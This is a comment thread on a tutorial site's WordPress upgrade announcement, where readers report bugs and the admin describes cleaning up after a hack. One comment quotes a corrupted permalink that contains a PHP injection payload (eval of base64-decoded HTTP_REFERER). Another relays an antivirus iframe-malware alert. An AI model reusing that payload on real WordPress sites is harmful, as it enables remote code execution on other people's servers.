Hey everyone,
I’ve just upgraded the web site to wordpress 2.7. If you’ve noticed that anything has broken, please report it here.
No additional downtime is expected at this time. :)

Hi
Keep up the good work. But I would prefer minimal downtime!.
Me as well! The good news is that upgrading the site took about 30 minutes today, and it appears to be back up and running okay. Can’t guarantee everything works, but the articles and comments are, and those are by far the most important things.
I can’t access the tutorial index that used to be at the main page. I only see this:
Break Time — Saint Petersburg
Break Time — Pluto Scarab Rails
Break Time — Dice Wars
The rest of the center area is empty. Reloading, etc. doesn’t solve the problem. I noticed this some days ago but later I checked and it was solved. Now it happens again.
Some link somewhere leads you to the index again, but just visiting the main page is not enough.
The tutorial is awesome, so :(
This has something to do with the caching plugin I’m using, but I haven’t been able to figure out what it is. Somehow it’s getting confused and caching the break time category for the front page (probably because it’s the first category).
I noticed that one of my .htaccess files was out of date and I’ve fixed that up. I’ve also asked for assistance on the forums for the caching plugin.
Please let me know if you continue to see this happening!
I have a suggestion. The order of comments should be most recent comment first.
Thanks.
Not a bad idea! I’ll look into it. Thanks for the thought.
Not sure why but I am having a problem in adding a comment to http://www.learncpp.com/cpp-tutorial/36-logical-operators/
The comment just not gets posted without any information on why or so. I have tried few times removing ’special’ characters from its body (like ” in PRE tags) but that also did not help. I am just redirected to http://www.learncpp.com/cpp-tutorial/36-logical-operators/#comment-37998 after pressing ‘Add comment’.
It’s probably getting flagged by the spam filter (this site gets an insane amount of spam). Most of these that are real posts should be automatically redirected to me for review.
Hi, I just want to say it’s a great site. I didn’t find any issues. Keep up the great work and THANK YOU.
A new version of Wordpress is available. Why don’t you upgrade?
Because I haven’t had time. :( Reading all these comments takes forever. :)
There is the problem with links in tutorials on that website:
example:
Now link show like that:
http://www.learncpp.com/2008/10/04/151-the-need-for-exceptions/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
After open this with Opera or Firefox it show:
Bad Request
Your browser sent a request that this server could not understand.
Wnen open link on that way there is no problems:
http://www.learncpp.com/2008/10/04/151-the-need-for-exceptions/
The site was hacked (using some sort of scripting exploit), and the hackers changed the database table entry that wordpress uses to determine how to redirect links to articles. Looks like they were trying to get it to redirect to some external website, except they messed it up and it redirected to a garbage URL.
In any case, the offending entry has been corrected, and it looks like the site is back up and running.
I apologize for the inconvience.
Thanks for quick replay Alex, now it seems there is no problem.:)
Here I found article that can be useful:
http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
Thanks! I did a google search for articles about this particular attack but this one didn’t come up.
I updated this site to the latest version of Wordpress yesterday after I found the offending lines in the database. So hopefully that will keep us up and running for a while longer. :)
I’ve also installed a firewall plugin to hopefully mitigate against some types of attacks. Please let me know if it seems to be adversely affecting the operation of the website.
Thanks!
Looks like you have some exploits still on your site, my anti virus currently won’t let me get on to page 4 of the tutorial, somthing about 1×1 iframes?
Anyway, i’m a computing newbie (hoping your site can fix that!) so here is the link to the forum on avast’s website
possible exploit detected: file: hxxp://feeds.feedburner.com/LearnCpp\{gzip} Malware name: HTML:Iframe.inf Malware type: Virus/Worm(the “hxxp” is written that way to avoid someone following the link)
Looks like your hacker added quite a few new ‘features’ you might have been happy do do without!
Hope this helps you maintain this awesome resource. But I’m going to hold off for a while until someone knows what the status of the site is!
Hope this post hasn’t ruined your day!
Thanks
Andrew
For some reason I’m not getting a confirmation email for this site. I received one for the forums but not this site.
